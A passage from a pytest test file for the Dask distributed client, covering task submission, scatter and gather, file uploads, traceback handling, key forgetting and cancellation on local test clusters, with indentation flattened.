L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
start = time()
while not (L[0].status == L[2].status == "finished"):
assert time() < start + 5
await asyncio.sleep(0.01)
result = await c.gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(client=True)
async def test_submit_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = c.submit(assert_list, [1, 2, 3])
result = await x
assert result
x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = await x
assert result
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(assert_list, [x, y])
result = await z
assert result
@gen_cluster(client=True)
async def test_map_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = c.map(assert_list, [[1, 2, 3], [4]])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = await c.gather(L)
assert all(result)
@gen_cluster()
async def test_two_consecutive_clients_share_results(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(random.randint, 0, 1000, pure=True)
xx = await x
f = await Client(s.address, asynchronous=True)
y = f.submit(random.randint, 0, 1000, pure=True)
yy = await y
assert xx == yy
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_submit_then_get_with_Future(c, s, a, b):
x = c.submit(slowinc, 1)
dsk = {"y": (inc, x)}
result = await c.get(dsk, "y", sync=False)
assert result == 3
@gen_cluster(client=True)
async def test_aliases(c, s, a, b):
x = c.submit(inc, 1)
dsk = {"y": x}
result = await c.get(dsk, "y", sync=False)
assert result == 2
@gen_cluster(client=True)
async def test_aliases_2(c, s, a, b):
dsk_keys = [
({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
({"x": "y", "y": 1}, ["x"]),
({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
]
for dsk, keys in dsk_keys:
result = await c.gather(c.get(dsk, keys, sync=False))
assert list(result) == list(dask.get(dsk, keys))
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_scatter(c, s, a, b):
d = await c.scatter({"y": 20})
assert isinstance(d["y"], Future)
assert a.data.get("y") == 20 or b.data.get("y") == 20
y_who_has = s.get_who_has(keys=["y"])["y"]
assert a.address in y_who_has or b.address in y_who_has
assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
yy = await c.gather([d["y"]])
assert yy == [20]
[x] = await c.scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = await c.gather([x])
x_who_has = s.get_who_has(keys=[x.key])[x.key]
assert s.tasks[x.key].who_has
assert (
s.workers[a.address] in s.tasks[x.key].who_has
or s.workers[b.address] in s.tasks[x.key].who_has
)
assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = c.submit(add, x, d["y"]) # submit works on Future
result = await z
assert result == 10 + 20
result = await c.gather([z, x])
assert result == [30, 10]
@gen_cluster(client=True)
async def test_scatter_types(c, s, a, b):
d = await c.scatter({"x": 1})
assert isinstance(d, dict)
assert list(d) == ["x"]
for seq in [[1], (1,), {1}, frozenset([1])]:
L = await c.scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
s.validate_state()
seq = await c.scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_non_list(c, s, a, b):
x = await c.scatter(1)
assert isinstance(x, Future)
result = await x
assert result == 1
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
[a] = await c.scatter([1])
[b] = await c.scatter([1])
assert a.key == b.key
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_tokenize_local(c, s, a, b):
from dask.base import normalize_token
class MyObj:
pass
L = []
@normalize_token.register(MyObj)
def f(x):
L.append(x)
return "x"
obj = MyObj()
future = await c.scatter(obj)
assert L and L[0] is obj
@gen_cluster(client=True)
async def test_scatter_singletons(c, s, a, b):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
future = await c.scatter(x)
result = await future
assert str(result) == str(x)
@gen_cluster(client=True)
async def test_scatter_typename(c, s, a, b):
future = await c.scatter(123)
assert future.key.startswith("int")
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
x = await c.scatter(123)
y = await c.scatter(123)
assert x.key == y.key
z = await c.scatter(123, hash=False)
assert z.key != y.key
@gen_cluster(client=True)
async def test_get_releases_data(c, s, a, b):
await c.gather(c.get({"x": (inc, 1)}, ["x"], sync=False))
import gc
gc.collect()
start = time()
while c.refcount["x"]:
await asyncio.sleep(0.01)
assert time() < start + 2
def test_current(s, a, b):
with Client(s["address"]) as c:
assert Client.current() is c
with pytest.raises(ValueError):
Client.current()
with Client(s["address"]) as c:
assert Client.current() is c
def test_global_clients(loop):
assert _get_global_client() is None
with pytest.raises(ValueError):
default_client()
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert _get_global_client() is c
assert default_client() is c
with Client(s["address"], loop=loop) as f:
assert _get_global_client() is f
assert default_client() is f
assert default_client(c) is c
assert default_client(f) is f
assert _get_global_client() is None
@gen_cluster(client=True)
async def test_exception_on_exception(c, s, a, b):
x = c.submit(lambda: 1 / 0)
y = c.submit(inc, x)
with pytest.raises(ZeroDivisionError):
await y
z = c.submit(inc, y)
with pytest.raises(ZeroDivisionError):
await z
@gen_cluster(client=True)
async def test_get_nbytes(c, s, a, b):
[x] = await c.scatter([1])
assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
y = c.submit(inc, x)
await y
assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_nbytes_determines_worker(c, s, a, b):
x = c.submit(identity, 1, workers=[a.ip])
y = c.submit(identity, tuple(range(100)), workers=[b.ip])
await c.gather([x, y])
z = c.submit(lambda x, y: None, x, y)
await z
assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
async def test_if_intermediates_clear_on_error(c, s, a, b):
x = delayed(div, pure=True)(1, 0)
y = delayed(div, pure=True)(1, 2)
z = delayed(add, pure=True)(x, y)
f = c.compute(z)
with pytest.raises(ZeroDivisionError):
await f
s.validate_state()
assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(
client=True, config={"distributed.scheduler.default-task-durations": {"f": "1ms"}}
)
async def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
np = pytest.importorskip("numpy")
lists = c.map(np.ones, [10000] * 10, pure=False)
sums = c.map(np.sum, lists)
total = c.submit(sum, sums)
def f(x, y):
return None
results = c.map(f, lists, [total] * 10)
await wait([total])
await wait(results)
assert (
sum(
s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
for l, r in zip(lists, results)
)
>= 9
)
@gen_cluster(client=True)
async def test_get_with_non_list_key(c, s, a, b):
dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
x = await c.get(dsk, ("x", 0), sync=False)
y = await c.get(dsk, 5, sync=False)
assert x == 2
assert y == 3
@gen_cluster(client=True)
async def test_get_with_error(c, s, a, b):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
await c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
c.get(dsk, "y")
@gen_cluster(client=True)
async def test_directed_scatter(c, s, a, b):
await c.scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
await c.scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
futures = c.scatter([1, 2, 3], workers=[b["address"]])
has_what = sync(loop, c.scheduler.has_what)
assert len(has_what[b["address"]]) == len(futures)
assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
async def test_scatter_direct(c, s, a, b):
future = await c.scatter(123, direct=True)
assert future.key in a.data or future.key in b.data
assert s.tasks[future.key].who_has
assert future.status == "finished"
result = await future
assert result == 123
assert not s.counters["op"].components[0]["scatter"]
result = await future
assert not s.counters["op"].components[0]["gather"]
result = await c.gather(future)
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_scatter_direct_numpy(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.ones(5)
future = await c.scatter(x, direct=True)
result = await future
assert np.allclose(x, result)
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
async def test_scatter_direct_broadcast(c, s, a, b):
future2 = await c.scatter(456, direct=True, broadcast=True)
assert future2.key in a.data
assert future2.key in b.data
assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
result = await future2
assert result == 456
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_balanced(c, s, *workers):
futures = await c.scatter([1, 2, 3], direct=True)
assert sorted([len(w.data) for w in workers]) == [0, 1, 1, 1]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_broadcast_target(c, s, *workers):
futures = await c.scatter([123, 456], direct=True, workers=workers[0].address)
assert futures[0].key in workers[0].data
assert futures[1].key in workers[0].data
futures = await c.scatter(
[123, 456],
direct=True,
broadcast=True,
workers=[w.address for w in workers[:3]],
)
assert (
f.key in w.data and w.address in s.tasks[f.key].who_has
for f in futures
for w in workers[:3]
)
@gen_cluster(client=True, nthreads=[])
async def test_scatter_direct_empty(c, s):
with pytest.raises((ValueError, TimeoutError)):
await c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, timeout=None, nthreads=[("127.0.0.1", 1)] * 5)
async def test_scatter_direct_spread_evenly(c, s, *workers):
futures = []
for i in range(10):
future = await c.scatter(i, direct=True)
futures.append(future)
assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
results = c.gather(futures, direct=direct)
assert results == [1, 2, 3]
delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
async def test_gather_direct(c, s, a, b):
futures = await c.scatter([1, 2, 3])
data = await c.gather(futures, direct=True)
assert data == [1, 2, 3]
@gen_cluster(client=True)
async def test_many_submits_spread_evenly(c, s, a, b):
L = [c.submit(inc, i) for i in range(10)]
await wait(L)
assert a.data and b.data
@gen_cluster(client=True)
async def test_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
tb = await x.traceback()
assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
async def test_get_traceback(c, s, a, b):
try:
await c.get({"x": (div, 1, 0)}, "x", sync=False)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
@gen_cluster(client=True)
async def test_gather_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await c.gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
def test_traceback_sync(c):
x = c.submit(div, 1, 0)
tb = x.traceback()
assert any(
"x / y" in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
y = c.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb)))
)
z = c.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(client=True)
async def test_upload_file(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", "def f():\n return {}".format(value)) as fn:
await c.upload_file(fn)
x = c.submit(g, pure=False)
result = await x
assert result == value
@gen_cluster(client=True)
async def test_upload_file_no_extension(c, s, a, b):
with tmp_text("myfile", "") as fn:
await c.upload_file(fn)
@gen_cluster(client=True)
async def test_upload_file_zip(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
try:
for value in [123, 456]:
with tmp_text(
"myfile.py", "def f():\n return {}".format(value)
) as fn_my_file:
with zipfile.ZipFile("myfile.zip", "w") as z:
z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
await c.upload_file("myfile.zip")
x = c.submit(g, pure=False)
result = await x
assert result == value
finally:
if os.path.exists("myfile.zip"):
os.remove("myfile.zip")
@gen_cluster(client=True)
async def test_upload_file_egg(c, s, a, b):
def g():
import package_1, package_2
return package_1.a, package_2.b
# c.upload_file tells each worker to
# - put this file in their local_directory
# - modify their sys.path to include it
# we don't care about the local_directory
# but we do care about restoring the path
with save_sys_modules():
for value in [123, 456]:
with tmpfile() as dirname:
os.mkdir(dirname)
with open(os.path.join(dirname, "setup.py"), "w") as f:
f.write("from setuptools import setup, find_packages\n")
f.write(
'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
value
)
)
# test a package with an underscore in the name
package_1 = os.path.join(dirname, "package_1")
os.mkdir(package_1)
with open(os.path.join(package_1, "__init__.py"), "w") as f:
f.write("a = {}\n".format(value))
# test multiple top-level packages
package_2 = os.path.join(dirname, "package_2")
os.mkdir(package_2)
with open(os.path.join(package_2, "__init__.py"), "w") as f:
f.write("b = {}\n".format(value))
# compile these into an egg
subprocess.check_call(
[sys.executable, "setup.py", "bdist_egg"], cwd=dirname
)
egg_root = os.path.join(dirname, "dist")
# first file ending with '.egg'
egg_name = [
fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
][0]
egg_path = os.path.join(egg_root, egg_name)
await c.upload_file(egg_path)
os.remove(egg_path)
x = c.submit(g, pure=False)
result = await x
assert result == (value, value)
@gen_cluster(client=True)
async def test_upload_large_file(c, s, a, b):
assert a.local_directory
assert b.local_directory
with tmp_text("myfile", "abc") as fn:
with tmp_text("myfile2", "def") as fn2:
await c._upload_large_file(fn, remote_filename="x")
await c._upload_large_file(fn2)
for w in [a, b]:
assert os.path.exists(os.path.join(w.local_directory, "x"))
assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
with open(os.path.join(w.local_directory, "x")) as f:
assert f.read() == "abc"
with open(os.path.join(w.local_directory, "myfile2")) as f:
assert f.read() == "def"
def test_upload_file_sync(c):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
c.upload_file(fn)
x = c.submit(g)
assert x.result() == 123
@gen_cluster(client=True)
async def test_upload_file_exception(c, s, a, b):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
await c.upload_file(fn)
def test_upload_file_exception_sync(c):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
c.upload_file(fn)
@pytest.mark.skip
@gen_cluster()
async def test_multiple_clients(s, a, b):
a = await Client(s.address, asynchronous=True)
b = await Client(s.address, asynchronous=True)
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.client is a
assert y.client is b
xx = await x
yy = await y
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.client is a
zz = await z
assert zz == 5
await a.close()
await b.close()
@gen_cluster(client=True)
async def test_async_compute(c, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = c.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = await c.gather([yy, zz])
assert result == [2, 0]
assert isinstance(c.compute(y), Future)
assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
async def test_async_compute_with_scatter(c, s, a, b):
d = await c.scatter({("x", 1): 1, ("y", 1): 2})
x, y = d[("x", 1)], d[("y", 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = c.compute(z)
[result] = await c.gather([zz])
assert result == 2 + 3
def test_sync_compute(c):
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = c.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
async def test_remote_scatter_gather(c, s, a, b):
x, y, z = await c.scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(timeout=1000, client=True)
async def test_remote_submit_on_Future(c, s, a, b):
x = c.submit(lambda x: x + 1, 1)
y = c.submit(lambda x: x + 1, x)
result = await y
assert result == 3
def test_start_is_idempotent(c):
c.start()
c.start()
c.start()
x = c.submit(inc, 1)
assert x.result() == 2
@gen_cluster(client=True)
async def test_client_with_scheduler(c, s, a, b):
assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y)
result = await x
assert result == 1 + 1
result = await z
assert result == 1 + 1 + 1 + 2
A, B, C = await c.scatter([1, 2, 3])
AA, BB, xx = await c.gather([A, B, x])
assert (AA, BB, xx) == (1, 2, 2)
result = await c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
assert result == 12
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_allow_restrictions(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[a.address]
x = c.submit(inc, 1, workers=a.ip)
await x
assert s.tasks[x.key].who_has == {aws}
assert not s.loose_restrictions
x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
await x
assert s.tasks[x.key].who_has == {aws}
assert x.key in s.loose_restrictions
L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has == {aws} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
await x
assert s.tasks[x.key].who_has
assert x.key in s.loose_restrictions
L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
c.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
c.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
with pytest.raises(TypeError):
c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
@pytest.mark.skipif("True", reason="because")
def test_bad_address():
try:
Client("123.123.123.123:1234", timeout=0.1)
except (IOError, TimeoutError) as e:
assert "connect" in str(e).lower()
try:
Client("127.0.0.1:1234", timeout=0.1)
except (IOError, TimeoutError) as e:
assert "connect" in str(e).lower()
@gen_cluster(client=True)
async def test_long_error(c, s, a, b):
def bad(x):
raise ValueError("a" * 100000)
x = c.submit(bad, 10)
try:
await x
except ValueError as e:
assert len(str(e)) < 100000
tb = await x.traceback()
assert all(
len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
@gen_cluster(client=True)
async def test_map_on_futures_with_kwargs(c, s, a, b):
def f(x, y=10):
return x + y
futures = c.map(inc, range(10))
futures2 = c.map(f, futures, y=20)
results = await c.gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = c.submit(inc, 100)
future2 = c.submit(f, future, y=200)
result = await future2
assert result == 100 + 1 + 200
class BadlySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
@gen_cluster(client=True)
async def test_badly_serialized_input(c, s, a, b):
o = BadlySerializedObject()
future = c.submit(inc, o)
futures = c.map(inc, range(10))
L = await c.gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == "error"
@pytest.mark.skipif("True", reason="")
async def test_badly_serialized_input_stderr(capsys, c):
o = BadlySerializedObject()
future = c.submit(inc, o)
start = time()
while True:
sleep(0.01)
out, err = capsys.readouterr()
if "hello!" in err:
break
assert time() - start < 20
assert future.status == "error"
def test_repr(loop):
funcs = [str, repr, lambda x: x._repr_html_()]
with cluster(nworkers=3, worker_kwargs={"memory_limit": "2 GB"}) as (s, [a, b, c]):
with Client(s["address"], loop=loop) as c:
for func in funcs:
text = func(c)
assert c.scheduler.address in text
assert "3" in text
assert "6" in text
assert "GB" in text
if "<table" not in text:
assert len(text) < 80
for func in funcs:
text = func(c)
assert "not connected" in text
@gen_cluster(client=True)
async def test_repr_async(c, s, a, b):
c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
async def test_repr_no_memory_limit(c, s, a, b):
c._repr_html_()
@gen_test()
async def test_repr_localcluster():
cluster = await LocalCluster(
processes=False, dashboard_address=None, asynchronous=True
)
client = await Client(cluster, asynchronous=True)
try:
text = client._repr_html_()
assert cluster.scheduler.address in text
assert is_valid_xml(client._repr_html_())
finally:
await client.close()
await cluster.close()
@gen_cluster(client=True)
async def test_forget_simple(c, s, a, b):
x = c.submit(inc, 1, retries=2)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key not in s.tasks
assert z.key not in s.tasks
assert not s.tasks[y.key].dependents
s.client_releases_keys(keys=[y.key], client=c.id)
assert not s.tasks
@gen_cluster(client=True)
async def test_forget_complex(e, s, A, B):
a, b, c, d = await e.scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
await wait([a, b, c, d, ab, ac, cd, acab])
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
assert b.key not in s.tasks
start = time()
while b.key in A.data or b.key in B.data:
await asyncio.sleep(0.01)
assert time() < start + 10
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
async def test_forget_in_flight(e, s, A, B):
delayed2 = partial(delayed, pure=True)
a, b, c, d = [delayed2(slowinc)(i) for i in range(4)]
ab = delayed2(slowadd)(a, b, dask_key_name="ab")
cd = delayed2(slowadd)(c, d, dask_key_name="cd")
ac = delayed2(slowadd)(a, c, dask_key_name="ac")
acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")
x, y = e.compute([ac, acab])
s.validate_state()
for i in range(5):
await asyncio.sleep(0.01)
s.validate_state()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate_state()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
@gen_cluster(client=True)
async def test_forget_errors(c, s, a, b):
x = c.submit(div, 1, 0)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=c.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(c):
s = str(c)
r = repr(c)
assert c.scheduler.address in s
assert c.scheduler.address in r
assert str(2) in s # nworkers
assert "cores" in s or "threads" in s
@gen_cluster(client=True)
async def test_waiting_data(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
@gen_cluster()
async def test_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
assert set(s.client_comms) == {c.id, f.id}
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
assert s.wants_what == {
c.id: {x.key, y.key},
f.id: {y.key},
"fire-and-forget": set(),
}
assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}
await c.close()
start = time()
while c.id in s.wants_what:
await asyncio.sleep(0.01)
assert time() < start + 5
assert c.id not in s.wants_what
assert c.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
await f.close()
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 2, s.tasks
def long_running_client_connection(address):
with pristine_loop():
c = Client(address)
x = c.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
@gen_cluster()
async def test_cleanup_after_broken_client_connection(s, a, b):
proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
proc.daemon = True
proc.start()
start = time()
while not s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
proc.terminate()
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
@gen_cluster()
async def test_multi_garbage_collection(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
x.__del__()
start = time()
while x.key in a.data or x.key in b.data:
await asyncio.sleep(0.01)
assert time() < start + 5
assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id, f.id}}
y.__del__()
start = time()
while x.key in s.wants_what[f.id]:
await asyncio.sleep(0.01)
assert time() < start + 5
await asyncio.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id}}
y2.__del__()
start = time()
while y.key in a.data or y.key in b.data:
await asyncio.sleep(0.01)
assert time() < start + 5
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
await c.close()
await f.close()
@gen_cluster(client=True)
async def test__broadcast(c, s, a, b):
x, y = await c.scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test__broadcast_integer(c, s, *workers):
x, y = await c.scatter([1, 2], broadcast=2)
assert len(s.tasks[x.key].who_has) == 2
assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
async def test__broadcast_dict(c, s, a, b):
d = await c.scatter({"x": 1}, broadcast=True)
assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
x, y = c.scatter([1, 2], broadcast=True)
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key},
b["address"]: {x.key, y.key},
}
[z] = c.scatter([3], broadcast=True, workers=[a["address"]])
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key, z.key},
b["address"]: {x.key, y.key},
}
@gen_cluster(client=True)
async def test_proxy(c, s, a, b):
msg = await c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
async def test__cancel(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, x)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
await c.cancel([x])
assert x.cancelled()
assert "cancel" in str(x)
s.validate_state()
start = time()
while not y.cancelled():
await asyncio.sleep(0.01)
assert time() < start + 5
assert not s.tasks
s.validate_state()
@gen_cluster(client=True)
async def test_cancel_tuple_key(c, s, a, b):
x = c.submit(inc, 1, key=("x", 0, 1))
await x
await c.cancel(x)
with pytest.raises(CancelledError):
await x
@gen_cluster()
async def test_cancel_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
await c.cancel([x])
assert x.cancelled()
assert not y.cancelled()
start = time()
while y.key not in s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
out = await y
assert out == 2
with pytest.raises(CancelledError):
await x
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_cancel_collection(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await c.cancel(x)
await c.cancel([x])
assert all(f.cancelled() for f in L)
start = time()
while s.tasks:
assert time() < start + 1
await asyncio.sleep(0.01)
def test_cancel(c):
